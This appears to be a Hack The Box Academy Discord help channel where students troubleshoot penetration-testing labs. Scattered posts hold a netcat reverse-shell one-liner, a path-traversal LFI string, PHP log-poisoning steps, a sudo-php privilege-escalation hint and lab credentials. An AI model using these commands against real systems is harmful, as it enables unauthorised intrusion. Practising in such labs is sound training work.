#modules

theeeennnnn

there is a discount

https://tenor.com/view/teach-me-how-to-dougie-gif-1779801749333750049

there's also gonna be one for AI Red Teamer; WHEN that drops, who knows

usually it's not the vouchers that go on discount

btw

it's the annual plans

when there is a new cer there is a discount for all vouchers?

and typically the one relating to the cert

oh shit am cooked 💔

i.e. silver annual if it's a cert that doesn't have tier 3 or higher modules
gold annual if it's a cert that has tier 3 or higher modules

then no discount for CWES

shit

can you convince my mom to pay for it

https://tenor.com/view/haha-gumichan-bird-no-laughing-gif-5128531988218293677

the most important thing to take away is the knowledge, certs are just fancy pieces of paper that say you did a thing. But the knowledge is what should stick with you

then can you be my mom and pay for it

are you rich

dude

what

get back to studying

okay mom

don't

what?

hmmm let me think

please keep the channel on topic

just quit while you're behind

then I will hack a website then get bounty to pay for it

get back to the modules; study up

okay

okay dad

You can send me a DM if you are still stuck on this one.

Ohhh ok

is there a way to share HTB Academy profile link same as ctf profile??

Attacking Common Applications | osTicket

I can't seem to get a working login. Tried both of the creds that were listed in the module - also googled around to find a dehashed.py script, but that doesn't work. Just a bit confused, is this box not working properly, or am I doing something wrong? Please @ with replies

just gonna have to reset the box until it works for me. Separate user reached out and told me it's something on my end

Any ideas on how to move Calc. Exe to the desktop? I am stuck on this finding evil module

i have the exact simillar issue
did you solve it?

did you solve it?
i have the same issue : (

Hello I need help in the password attacks module please

for the Writing Custom Wordlists and Rules in Password Attacks I need help please

Hi, I am seeking clarification on the correct way to solve this question:

Module:
HTB CDSA Path -> Windows Attacks & Defense section -> Kerberoasting

After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?

What I have tried:
I searched through all the security logs, Server Roles custom views, and Applications and Services Logs, however I could not find any reference of an SID for the webservice user. I searched using EventID 4769 using the filter in the Security logs section, however I did not see any entries for the webservice user. I also tried checking EventID **4624 **for a possible login but I did not find any entries for the webserver user.

I looked in the chat's history to see if someone else had answered it but Im still confused

My workaround
I pulled the SID directly using Get-ADUser "webservice". But I feel as if I missed the entire point of the lesson doing it that way. Can anyone explain where I went wrong?

Thanks!

Hello I need help in the password attacks module please
for the Writing Custom Wordlists and Rules in Password Attacks I need help please

you can DM me

good

Hey all I am having issues with the File Upload Attacks Whitelisting challenge question in CPTS.

I have successfully identified multiple extension the page will accept. I upload a file with a php cmd payload that shows “file uploaded successfully”. When I navigate to the page I keep getting a 404 error. I have encountered this issue with multiple file extensions that were accepted, tried resetting the box, and still get the 404 error.

you can DM me if you want

Im rn in the Windows Command Line module , i have a single exercise left but im not able to access the required machine from my vm , its giving out "ssh: connect to host 10.129.248.223 port 22: No route to host" as the error

has anyone faced this?

no..i didnt manage to.

https://www.linkedin.com/posts/hackthebox_htbacademy-hackthebox-cybersecurity-activity-7401628772401217537-p6lM?utm_source=share&utm_medium=member_ios&rcm=ACoAADPP2KwBFldcRIOZVzUj9sF6dsp1k8Dao4c

Hi everyone, I'm stuck on this module - "Firewall and IDS/IPS Evasion - Hard Lab", would someone be willing to answer a couple questions i have please?

find the source of your problems before scanning 😉 (this is gone over in the reading)

yes that part i understand, i guess my only question is i am suppose to click the button to download the new vpn connection file correct? and from what i understand it should be the "academy-hard-ovpn" but mine keeps downloading the "academy-regular.ovpn"? or am i completley wrong lol

you're completely wrong

all academy modules use the same vpn connection, much like you can do all the active machines on labs from the same vpn config

also you didn't get a diff vpn for the easy lab either 😉 they're all the same

ok, so i should be able to just open my pwnbox and solve it? im just doing it wrong then?

the only different vpn entirely is the Exam vpn

pwnbox is the in-browser vm, that shouldn't be running at the same time you're using the vpn on your end.

ok. so that button that lets you download the vpn is only if you using your own vm? if your using pwnbox you dont need that? sorry if these are stupid questions im still fairly new

correct

ok thank you

https://academy.hackthebox.com/course/preview/intro-to-academy <-- this module should explain most of how academy works

ok awesome, i appreciate it

Working through Attacking GitLab

Anyone know what the issue here is?

└─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [10.10.15.130] from (UNKNOWN) [10.129.99.59] 50106 bash: cannot set terminal process group (1294): Inappropriate ioctl for device bash: no job control in this shell git@app04:~/gitlab-workhorse$ exit /bin/bash shell python3 -c 'import pty; pty.spawn("/bin/bash")'

Tried a couple of different methods that I could think of, but I know I have to be doing something wrong

literally the first line says -> exit

so something is up with your shell

I just copied from the module....

'rm /tmp/f;mkfifi /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <my IP> 8888 >/tmp/f '

i'm just going off what I see where literally the first thing i see is exit

also it's mkfifo, not mkfifi

that would do it I think

that was it, thanks

Hey there how's it going?

Does anyone know how would you upload a file into an HTB vm?

i have to encode it in my actual PC and decode in in the VM , right?

yo , i just tried it , it worked, Thank you

hi for the one question of the Tapping into ETW section of Windows Event Logs and Finding Evil module, I am having trouble figuring out how to find the method. Is anyone available for DM?

I have been at it for an hour or so now maybe one and a half hours

I really want to solve this one

I am on windows priv esc , outdated server section . When I try to xfreerdp I get error about ssl . How can I fix it ?

hi I am following the exact instructions for Tapping into ETW section of Windows Event Logs and Finding Evil module and it still won't work. Can someone hint me in the right direction?

this is for the only question of section

I know I asked earlier but is anyone able to DM?

is there a way to revert back to original htb UI like in the academy or no?

Attacking Common Applications | Attacking CGI Applications - ShellShock

I'm quite lost here. The module explains how to test for the vulnerability. What I don't understand is where to test for the vulnerability. They suggest this is to be done in some sort of terminal on the target website. But, when I hit the website, it's a default Apache site, and I can't appear to get anywhere else... Can I get a nudge or something? Please @ with replies

The commands in the module are executed on your attack host

Oh alrght

You are attacking a cgi script

Not a web app

hi is anyone able to DM who has done CDSA?

So just follow the content/walk through and you should be allgood

Use the flag to ignore the cert

Hey there , how's it going? struggling with "Working with IDS/IPS" module, i'm stuck at "Suricata Rule Development Part 2 (Encrypted Traffic)" section.

What is that flag? If you mean /cert:ignore , I didn’t work for me

Maybe another client like rdesktop or remmina?

hello i'm stuck on this module 😐 😭 https://academy.hackthebox.com/module/268/section/3064 i succeced reset passord on endpoint /api/v1/authentication/customers/passwords/resets/sms-otps but the user don't have role attribued itself. btw i succeced the challenge on the course with file upload but I don't know what else to do

tried so many strings including GrftgretGF45 , which didn't even work

i found the flag for everyone who is stuck Unrestricted Resource Consumption dm me x) it's very tricky

Really weird how for the module privileged access, I was able to ingest data with bloodhound-python on linux but could not query CanPSRemote. Yet running Sharpview on Windows and using the GUI worked FINE. To troubleshoot, I even tried downloading the zip from windows and it still failed on linux Bloodhound CE.

After searching Discord, it seems like a lot of others have faced this problem too

Hi, I am stuck on Attacking common application WordPress - Discovery & Enumeration question 3 - Find the version number of this plugin. (i.e., 4.5.2)
I read the readme.txt file and it gives me the version, but the it isn't working
I found the version near softwareVersion and near changelog

Found it
I was in the wrong page

hi guys I am still stuck on Windows Event Logs and Finding Evil - Tapping Into ETW question 1. I am following the exact instructions from the section but it isn't working

I did everything exactly as the section specified

Hello currently doing the File Upload Modules under the white list filters, I am trying to bruteforce for whitelisted PHP extension in turbo but all response are Only images are allowed

Dm me!

Hey man, excuse me, I would like to ask how the problem of DNS Spoofing (Attack) in HTB Academy Wi-Fi Evil Twin Attacks is reproduced? I have tried many times and can't get the answer I want, can you give me some hints?

is it in your /etc/hosts file?

└──╼ [★]$ cat hosts
127.0.0.1    localhost
127.0.1.1    debian12-parrot

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-kual6aviq9 htb-kual6aviq9.htb-cloud.com

It doesnt have to be this is a publicly available website. The problem is free accounts cant access it with pwnbox.

Hi there, just wanna check if anyone cleared SQLMAP Essentials -> Attack Tuning. For Case #5, is the flag different from what the answer is expected of? I got the flag from the db already but the website is rejecting it. There's no space at the suffix so i'm confuse why am I wrong 💀

hi guys, Im doing the Attacking Common Applications - Exploiting Web Vulnerabilities In Thick-Client Applications

I modified the User.java file to remove the hashing and stuff, and reassembled the jar file, but when I run it it no longer works

like the assembled jar file doesnt even open

so who is the owner of the module?
how can i ask him question here?
bertolis
@sick fulcrum
is that you?
i dont know how to solve android dynamic analysis- for the insecure library load through deep linking-, the app dont update to v2
and i cannot solve it with the provided solution, could you pleae help me?

i have a problem in AD skill assessment 2
i have made a reverse shell with the sql and used mimikatz to dump the ntlm hashes using lsa_dump_sam from meterspreter but the hash i found of the admin didn't work and when opened a writeup it was a different one and the hash from the write up worked why is that is the ?

sqlmap is pretty buggy.. got two different flags after refreshing the machine 💀

IMO at this point in the path and content you should know why it didn't work. Think about the hashes you dumped and what accounts they belong to. I'm definitely not trying to be difficult or mean, but I believe you actually know the answer as to why it didn't work and just need to think about the overall context of what you have.

Module : Abusing HTTP Misconfigurations
Section : Web Cache Poisoning - Tools & Prevention
Question : Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application.
can you help me please , i have done everything and i have submitted multiple answers but none of them work

I am in the wordpress hacking module doing the skills assesment. Why am I not getting the actual request despite sending a POST req and the content-length being 403?

Am i missing something here or there is something off here?

hello guys , have anyone encountered some problems form the revshell via splunk

i get to download the tarball with the powershell pointin to my attackin machine but it seems like its not executin when i download the package

you wouldn't be the only one. i have encountered everything wrong in splunk unfortunately :(. here's hopping we get a response.

did you got the rev shell on the atttackin splunk section ?

cuz i've done all the steps idk what am i missin

Nope. but i think there are issues with splunk in general

so basically i can't submit the flag

i may use some recent cves and see if they'll work

Yup, tell me about it!

How do you do that?

might be handy for my lab too and if you could tell me i'd appreciete it

yeah for sure i'll check if it works

and then i'll tell you

Thanks

Hey everyone

system!

• 5 Start the above target, copy the shown IP:PORT by clicking on them, and then paste them in your browser. What's the proof shown in the page?

Can someone help me with this please

I have a silver subscription already... if i get the 25OFFANNUALDEC25 deal, will it stack ontop.. so i get 12+ months when my current runs out ? *im not really sure where to ask tbh

Please don't ping random people for a question

Also make sure you ask questions so that people can actually help you by reading this #modules message . I don't know what module/section you're on by reading your question

Ask support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Word of advice - normally you can google the question you're on within a module and you can find a HTB Forum page that will help

there're only authenticated cves can't find some anonymous ones , I can't figure it out

dang , guess we're both stuck on this lab then, smh. thanks for the update.

i don't know how did the others got that shell

i'll just keep doin the rest

Is the app you installed showing enabled within Splunk?

yes it is

i've tried to disable and then re-enable

but still the same issue

Can you post the link to the section you are working on so I can verify we are talking about the same section?

https://academy.hackthebox.com/module/113/section/1213

Cool that's the one I thought, so go ahead and send me a DM and I'll look over what you have going on.

thank youu man

Does anyone know how to overcome powershell breaking when following the module instructions?

https://academy.hackthebox.com/module/218/section/2389

If someone knows how to install apps in splunk would be much apprecieted

Attacking Common Applications | Attacking Splunk?

Nope

I am seriously stuck on "Firewall and IDS/IPS Evasion - Hard Lab". Is there anyone who is willing to help me out

I mean installing an app in splunk should be the same

Top of the screen should show "Apps" (towards the top left) then go from there

yeah thing is : when i go to install any app, it always gives me an error

What error?

It happens everytime

what are you trying to do in this app? I'm headed to lunch right now - if no one else can help / you don't get it I'll try when I come back

I want to use it to search as asked

sysmon

https://academy.hackthebox.com/module/233/section/2523

Can anyone kindly help with this? it won't take the missing process despite it actually being missing

Hey guys, anybody passed recently "Skills Assessment - Password Attacks". I mean recently? (nexura administrtor NTLM question) I heard that that assessment was changed recently.

I believe I checked everyhting that there is shared on FILE01 server that user hw.... has access to, and I see nothing of interest.

What's the next step? Bforcing other domain users (stom, bdavid) or what? Completely lost.

Hey , is it okay if i DM you?

Revisit those shares and see if there are any protected archives of interest.

yes there are some old password psafe3 files, but no password for them.

Revisit the cracking protected archives section to see what is possible.

That's what i mentioned initially. If pwd cracing is expected i believe it would be fair to hind which pwd list is the correct one (rockyou i suppose). I don't believe there is too much education in targetted cracking because it is utterly unreliable in real world.

But thank you for your suggestion r1ckyr3c0n!

Yeah for the most part rockyou will work for things like that.

Hi

Hey someone does know which lab is the "Skills Assessments" of the Attacking Enterprise Networks module?

I'm guessing is the last one(?

hi is anyone able to help me with the Tapping Into ETW section of Windows Event Logs and Finding Evil module?

like today? one on one?

solved

never mind

I solved it myself

Just want to express my distaste and dislike for the Thick Client Applications modules.. What a confusing module to go through...

Every "valid" password I've found is marked wrong

Hi guys - so currently on the Crackmapexec module > Kerberoastable sections > Trying to get accounts . no matter what i do from the pwnbox I get nothing back. I 've even copied the syntax from the 'show solution' and it gave me nothing back. Any ideas?

nvm, I'm stupid

Hello all

Please help me in academy sql fundamental, last exercise skill injective : The last task cannot be injected, and the task site works without VPN and on the https protocol.. who can help with it?

Chattr

you can DM me if you want

Rockyou isn't needed

@tame wave be careful with sharing screenshots that contain answers

Its injectable, you may have to bypass login first

Hey guys
By any chance does anyone know why answers of the wifi penetration testing tools and techniques are not available?

In the "Pass the Ticket (PtT) from Linux" module from Linux. I was able to use Julio's ccache ticket from linux01 to log into his account on MS01 via proxychains and evil-winrm. I then used a powershell command to extract keys via Rubeus and Mimikatz, however, all of the tickets tied to his account were http service tickets - which (to my understanding) won't allow us to access C over Linux. Was anyone else able to export Julio's tickets from MS01 and then convert the .kirbi or base64 ticket into ccache and then upload to Linux to access C?

If the kirbi files found in memory are expired, you might be able to request new ones. Look into over pass the hash attack

Ah I didn't even think of that sorry

Ah then I guess I took a different route to working through it.

Hey guys, In the log injection section of the HTTP Attacks module, does anyone know how to bypass the filter for < and >?

could someone please assist with case 7, ive spent the past 2 days trying to get this flag to appear but nothing is working and I needing to do more to the command ?
https://academy.hackthebox.com/module/58/section/526

Mutual

i think it was made from some part of an insane lab

i hope all insanes don't look like this lol

hello everyone sorry what Im about to say is not related to modules but I cant remember wasnt there like a /feedback or something sorry!

Yeah /feedback

can i DM anyone about the Broken authentication skills assessment please?

never mind solved it. 😄

omg thanks hahaa

Hi friends, currently at skills assessment of Password Attacks module. Ssh'd into jbetty user in dmz but when I run proxychains, it reads command not found and when I try to install with sudo it throws an error " "jbetty is not in the sudoers file". Proxychains.conf file doesn't exist either. Anyone having an idea what I am missing ?

I'm gonna restart the lab, see if that fixes the problem

Why not use that host as a pivot, do dynamic port forwarding ssh, or just use Chisel or Ligolo? I think that would be a better option.

they're not installed on this host. I will terminate the target and fire up a new oneF

I don't know about dynamic port forwarding ssh tho, I'll look it up. Thank you

if you meant ssh -d , If I recall correctly that also timed out I believe bc there was no route to other hosts than DC01

in /etc/hosts file and since I was not in the sudo list, I couldn't edit it either

Ah, okay. In the password attacks, it seems to be assumed that you already know how to perform pivoting. You can try transferring pivoting tools such as chisel or using ligolo. If you want, I can help you. Send me a DM.

just did

For future reference, necessary tools are installed on the attack host. Not the dmz

Ive found if theres a folder called tools (usually inside home or C: ), if not present, no tools (intentional)

I noticed on the "Windows Privilege Escalation" module that users (which are no administrators) can get their privileges through UAC...I just didnt quite understand how this works.

Basically the htb-student user has the standard low privilege rights. I checked groups etc. andere is no admin group from what i can see. When i prompt the cmd.exe with "Run As Administrator" then i get the Privilege assigned (SeTakeOwnershipPrivilege). I authenticate against UAC with the htb-student user. In the "administrative cmd" the user also doesnt have any administrative groups.

Can someone explain why this happens and/or works?

the privilege is disabled by default in the standard user context, you need to elevate through UAC to see it, as thats where you get the full token where the priv is available even if you arent an admin

so you arent an administrator, and UAC doesnt give you admin privs, UAC just gives you that privilege

you can then use that to take ownership of files you need to elevate or have creds in them

did you run into a powershell bug where it stopped working if you disabled file/folder deletion in temp?

Just to get monta to work I had to run a couple different things as admin - but gave up after that @mellow niche

I told him how to do that

call me a good boy

I'm in the same boat. The default message is not specified and is "classified as ham" 100% or anything over 90% or some other threshold? I have manipulated all of the messages listed on the page in my local instance to come back as ham, but they all fail to pass the question. Same thing with manipulating the model, I can get it to classify as required by the question yet again no pass. If you don't know what the question is or the format required or the way the answer is evaluated to answer it defeats the purpose. I had the same issue on the Immersive Labs platform, so they reworded a number of their questions. If the response format is well defined, then it is simple to answer the question. When formatting is unknown or there is ambiguity is in the question, the module becomes tiresome and the platform becomes far less valuable as this module has now become a waste of my time as I do not know how to answer the question.

Which question was the issue? It's hard to tell from this

I am beyond lost with the introduction to nosql injection skills assessment part 2. Anyone have any pointers. The entire module was not bad then just completely wrecked!

ok but is this always the default? So can users with additional privileges just use UAC and only then get them assigned? its probaly related to the switch into the High Security Context from Medium Security Context

guys i got a flag but it keeps teling me i put it wrong

i did copy paste

and try all the ways to put it

what part of it shold i copy and paste ,like i try to put all of them but it just wont work

Red Teaming AI - Manipulating the Model
The default message is not specified and is the question content "classified as ham" 100% or anything over 90% or some other threshold? I have manipulated all of the messages listed on the page in my local instance to come back as ham, but they all fail to pass the question. Same thing with manipulating the model, I can get it to classify as required by the question yet again no pass. If you don't know what the question is or the format required or the way the answer is evaluated to answer it defeats the purpose.

This appears to be a common problem with this module. The questions can't ba answered because no one knows what they expect the format for the answer to be

Having super weird VPN issues... VPN keeps connecting, then reconnecting and it's an endless loop... downloaded a new file, same thing... Any ideas on how to fix? Please @ with replies

@grizzled schooner
I'm having trouble as well, I did not further investigate though.
But my VPN is not having a great time today..

That's not what I'm getting!

and it just keeps looping

Can't even do this module, because the VPN keeps buffering (?)

I do have trouble too

US or EU?

EU

Are you seeing the same thing happening as I am?

I actually don't because I use the vpn a different way and i can't see the logs but I can't ping the machine I start on the lab after 2 minutes so I restart it over and over again

Willing to be it's the same thing happening...

yeah I'm just gonna stop and continue tomorrow

I'm working on NFS in the fingerprinting module and I found the nfs shares on the target but no matter how I try to mount the shares i get "mount.nfs: access denied by server while mounting 10.129.223.91:/var/nfs" I've tried setting verision, nolock, connection types but I can't seem to get anywhere. Does anyone have any guidance?

It's been a super long time since I've done that, but have you tried with sudo? Sounds dumb but does work

fair, I did have sudo and I read through the redhat common mount options page and tried all the settings from there but no luck. I've also tried resetting the box, so now I'm stumped.

Hmm... I'm not too sure, sorry!

tun1
sudo killall openvpn
then reconnect

fair, thank you

While vpn running? lol

did u run sudo mount -t nfs ?

it'll kill the running process anyway

but there's something going on where openvpn didn't terminate another connection you had running, which is why you have tun1 there instead of tun0 (unless you have another vpn tunnel running for another service)

I tried with other options as well but this was the basic command: "sudo mount -t nfs 1target:/share ~/Documents/t/ -o vers=3,nolock" and the folder t does exist there

when you ran showmount -e did you see NFS shares?

yeah, there were two shares, /var/nfs and /mnt/nfashare/

So I had sudo mount -t nfs 10.129.180.251:/var.nfs ~/Documents/t/ -o vers=3,nolock

Why are you specifying version?

I was messing around trying different options. vers 3 is the only one that exists according to the nmap scan, so I tried specifying version to see if it would help

have you tried making directories for those NFS shares?

Enterprise links wont work as theres a key part linked to your organization as part of it

can somebody help me . when i am coonecting to vpn than it takes to long and failed to connect

Try one of the steps that are related to your error:

https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

thank you very much bro

When i get the flag? (Introduction to Windows Evasion Techniques module)

You have to follow the instructions precisely

shit, i was using a custom loader

thanks then

FootPrinting-> IMAP/POP3
Trying to solve the labs, i am having trouble connecting to the target using creds || robin:robin || it is giving me error (from ncat)
"Plaintext authentication disallowed on non-secure (SSL/TLS) connections."
but using openssl to connect to the target won't give me any response backs, anyone faced the same issue?
i am using this command to connect
openssl s_client -connect 10.129.232.190:imaps

Are you using tags within the queries/commands?

no, just a LOGIN robin robin

but the error is not about it isn't it

Hi,
I’m currently doing Attacking FTP from Attacking Common Services. But the box seems to not show service on port 2121 running… is anyone experiencing the same issue ?

Attacking GraphQL: After executing an introspection query, what is the flag you can exfiltrate? I don't seem to see a flag after the query. Can someone pls give me a hint of sort?

Hi,
I’m currently doing Windows Attacks & Defense Kerberos Constrained Delegation part on the soc module and i can run this as it says in the attack

Import-Module .\PowerView-main.ps1

you don't just run it, you import it.

also don't forget to set the execution policy to bypass

yeah facing the same

F

me too

What happened to HTB ?

Most applications are not working. I think it's again the cloudflare

turns out not only me having this problem

me

but i redid the nmap and somehow it shows on the second try

Yeah The problrm is for all

it's cloudflare

again

not just HTB

Friday in Cloudflare)

kek

fixed now

yup fixed now

yeeeeah boy

i will try but i think i did it

it worked thank you

Why are the AD modules so wierd? I'm doing the enum & attacks on AD module, literally can't RDP tried soo many different things, finally just moved with working on winrm. This is what I faced on the "misc misconfigurations" and the attacking domain trusts as well

:/

i need help on Windows Attack and Defense Print Spooler
Having trouble with submitting the answer to the last question. I completed the attack, connected to DC1, changed the registry to prevent the attack and restarted DC1 and attempted the attack again. The question says to submit the error message as the answer when running dementor.py from the kali machine it lets us spawn. I copied and pasted the error message but it tells me the answer is wrong. Any help would be much appreciated.

Error message that i received.
[-] exception RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.

What options did you use ?

in Skills Assessment - Password Attacks im in the JuMp server and i got an admin password from the tmp folder.. is that a rabbit hole? should i even reach dc or can i dump lssass then provide the hash?

I keep getting the ERRCONNECT_CONNECT_CANCELLED and get disconnected, I've tried everything but it just refuses to work??

Does this module don't include RDP login creds? practical only comes at setting up handler and ssh (https://academy.hackthebox.com/module/158/section/1427)

Teaches what to do on windows but you can't do it personally because there's no creds.

please be mindful while trying to ask for clarification in a section in terms of not taking a screenshot of the contents of the whole section

Good morning everyone. I've just finished with the Web Enumeration section of Getting Started. I'm going back through the steps to try and use curl as much as I can to get more familiar with it and I'm getting hung up on using the credentials to get through the login portal tried using curl -u <username>:<password> http://<IP Address>:<Port>/. Any tips? Thank you!

try to put the Username and password in the URL
http://username@password:IP:PORT

If you are stuck on the HTTP response splitting you can DM me. Just know you have everything you need to inspect what is happening and perfect your payload.

is there any machines that looks at any idps?

does the last sentence sound logical?? feel like its a #1234357888114364508 , but dont feel like i have to make a post if its just me misunderstanding

Does anyone else encountering this problem?

I have before. Just try a different pwnbox area.

Not working 🤷‍♂️

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

^ then reach out to support

I am on the broken authentication module. The first brute-forcing passwords question: what is the password for ‘admin’

The example uses rockyou.txt
In the workstation: there’s 20+ rockyou.txt.
Does anyone know which rockyou.txt file I should use to ffuf the password with?

they're generally all gonna be the same, though the example should give you the wordlist location if i'm not mistaken. otherwise just pick one and go

Will try the -70… wish me luck!

ah yeah they are broken into sections in some places

there should be a full list on the machine

if you are still stuck you can DM me if you want

just run it twice :v

im confuse as well on that part haha

I had trouble with this the script would lock up I just ended up trying a bunch of pins the output made

hello, yall do have some target problem ? like i can't ping them after 5 minutes I have to launch the target again. I tried changing vpn

hi

ineed help on moduel

if you describe your question in more detail, more people would be willing to help you

ifix it its just about the revers shell

After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag

guys here when i do sudo -l

ALL : ALL) NOPASSWD: /usr/bin/php

so ineed to make php file that can read root.txt file ?

https://gtfobins.github.io/gtfobins/php/

You have sudo right on this binary so look under SUDO section on gtfobins

You can leverage to root instantly

ty bro so mush

New to HTB, doing the File Transfer module. Is there an easy/quick way to get the upload_win.zip onto my Pwnbox, or is getting that onto my Pwnbox to get to the target machine just part of the challenge?

hover over the zip file, copy link and then try " wget link(copied link)" in the commandline

No dice. I can ping academy.hackthebox.com from the Pwnbox, but get a timeout when trying to wget/curl.

have you tried browsing to academy on the attack box

Yes, times out on the Pwnbox browser, too.

how about you base64 encode the file on your own pc's commandline , copy the output and paste it in your attack box command line to decode it there

I'll try, it's a zip file, but I can unzip and do. Thanks for the idea

You figured it out?

yeap turns out I was trying the wrong username lol

Cool

Look at the last section before skills assessment.

Not sure if this is related, but I was getting the hash from mimikatz through SSH and it was failing the auth, until I used RDP and the same mimikatz returned a completely different RC4 hash that worked for the logistics$ account

@iron yarrow the module is above tier 0; please refrain from sharing spoilers for skill assessments. as a reminder, the module tells you about several different methods for bypassing some restrictions

Has there been an issue with spawning targets???

Idk but I am facing another issue, I can spawn the machine. But can't query the cross forest at all ...... ?? Im stuck at the cross forest attacks from windows part because I just can't get any kind of users from the other forest?? Could someone help me with this please

I see the error "a referral was returned from the server"

@foggy jackal Hi v2 is working if it installed on actual android phones

Anyone knocked out the module "Introduction to Linux Forensics" Stuck on the meterpreter uuid question..

Thanks.
I finished the skills assessmemt a few days ago.

What part of a TE.TE smuggled request will prevent the second request from being cut off? Or what should I study to figure out the answer to my question?

is that a question from the module? if so -- it should be explained within the module reading.

It’s not an actual question in the module but it is an issue I am having. I’ll read it again but I don’t seem to see anything in there that discusses what might cause some of the requests to be served fully and others cut off half way? I’ve played with keep alive and see some improvement but not enough. Thanks though

well TE.TE is just transfer encoding Frontend.Backend; what can cause cutoff is simply the modification/change to the request; maybe the portswigger page can help you figure more out https://portswigger.net/web-security/request-smuggling

it's just obfuscating the header

Thank you! I will try that. The chunk size should make a difference but I’m having issues wrapping my head around this. It’s only an issue when sending requests every second. Which tells me my request is not clean and precise.

hiiiii

i hope everyone doing good

hello guys, just wanted to ask whether you guys have a connection problem to the academy these past few days or not

no man its working all fine

workin for me too

i mean reset your connection

ig then itll work

aight aight

Can you help me with this question? I’m honestly close to losing my mind.
I have 13 Azure users and 3 that have a path to Global Administrator, but that still doesn’t seem to be the correct answer.
What am I missing?

In the Footprinting module, the DNS part, couldnt find the subdomain with IP ending with octet 203, after turning on step by step solution i found that the subdomain is in the namelist wordlist, the question is in real pentest how to know which wordlist to choose? Is there any thought process which leads to the right wordlist?

I do

connection keeps breaking rightt

yes, can't even ping the machine i have to reset

I'm on the footprinting module and I keep getting problems after less than 5 minutes...

yea im at attacking common services

Skills Assessment - File Inclusion

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

I need help

Where are you stuck?

I managed to send the file, I sent PHP, PDF, and JPG.

I found a parameter but I can't explore it because it says it contains invalid characters.

hey can ayone tell me if we need to reach DC to submit the has or can we just grab the admin has from other accounts ? for saw jump 1 (Skills Assessment - Password Attacks )

Have you tried to leak source code maybe ?

Yes, it has an href <img

@hidden ledge

Hello, in the web fuzzing module validating findings section, it tells me that I can just read the header and read the contect length to see if the page exists or not. I was wondering if thats what am I suppose to do in the real world and I cant really read the sensitive web pages

I mean backend source code

With what you were taught during the module

How would I find the back-end source code?

That's all the point of the File Inclusion module :))

yooo im at skill assessment - ease attacking common services, im having a trouble as i dont see an entry point. I suppose that i can enumerate users from smtp, but turns out it doesnt give anything as well. Read the writeup and t suppose to give me something. Do you guys have this problem as well but the first entry point is ot the smtp?

try to adjust your wait times

damn that affect things?

yeah, no luck as well

set the wait time to 10

try 15+ seconds

guys i'm in Password Attacks module - pass the Certificate and i'm stuck with winRM error

what does the error say?

Cannot find KDC for realm "INLANEFREIGHT.LOCAL"
is your krb5.conf properly set?

no

what to write in ?

and where to find it

hmm... run nxc smb <target_ip> -u 'whatever' -p '' --generate-krb5-file file && sudo mv file /etc/krb5.conf

sorry, make sure to add the target ip too

i found this one

it's pwnbox

where to edit and what to write ?

alter the one at /etc/krb5.conf

run the command i sent

will create your file, move it there

[★]$ nxc smb 10.129.231.223 -u 'wwhite' -p 'package5shores_topher1' --generate-krb5-file file && sudo mv file /etc/krb5.conf
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file
usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
           [--verbose] [--debug] [--no-progress] [--log LOG] [-6]
           [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT]
           [--version]
           {mssql,winrm,ldap,smb,ssh,vnc,wmi,ftp,rdp} ...
nxc: error: unrecognized arguments: --generate-krb5-file file

hold please

pwn box nxc is outdated, do it manually, edit /etc/krb5.conf @minor belfry

or you can upgrade your nxc version and rerun the command

can you give the prober thing

i have done it before and it didn't work

what to write in krb5.conf what i mean

does the file exist?

yea in /usr/share/samba/setup/krb5.conf

that one

run this

please fill in IP with targets ip**

save this script for later when you need to redo this, and make it a habit to update your nxc, pwnbox's is quite old

yea ik but my internet is sucks so i have to use pwnbox for now

all good

module is above tier 0, please refrain from spoilers :)

Hello, i am stuck at injection fundamentals module, section skill assessment, can i dm someone for a nudge on initial access. I think i must do a sql injection to register myself but nothing seems to work.

Is it ok to just follow the walkthrough for AEN to save time and start the test.

lol

instead of blind*

that's up to you; the reason it's recommended blind is to test your methodology. It's not about the time it takes

is the module section only available for vip people?

no

academy has 0 to do with VIP

where do i find it?

https://academy.hackthebox.com

nvm found it on the top right

sheesh those modules are expensive haha wallet is gonna dry out 😄

that's why the plans are the better value overall 😉

that's what the % discount means on the monthly plans you save x% compared to buying the same amount of cubes directly

will take a look into it, pretty interesting 🙂 thanks

I hope if HTB has a module about PHP

Hi, I’m stuck on an exercise in Introduction to Bash Scripting section comparison operators, and I don’t know what I should do in this situation

Document and reporting practise lab. I can’t find the admin credentials to log in to the report writing web app on port 443 as mentioned in the course . The admin credentials are not provided . Please help !

you can DM me if you are still stuck

Hello everyone. I just finished a lesson on organization in the setting up module of the Information Security path. I was abit confused with the notes on Logging at the latter part of the lesson. I'm I to make those changes in the VM instance. Also do I need to download some of the tools recommend seeing how I'm just starting the lessons as a beginner.

Hello guys, I'm new here and I'm stuck to the Skill Assessment in File Inclusion Module.
I can read the /etc/passwd file and look for Log Poisoning.
I have the following path GET //api/example.php?p=....//....//....//....//example//example//example//access.log
I injected the PHP Payload with the user agent and can see the payload in the log. When adding the '&cmd=id' to //access.log request, nothing happens. Why? What am I doing wrong?

You dont have to

Noted thanks

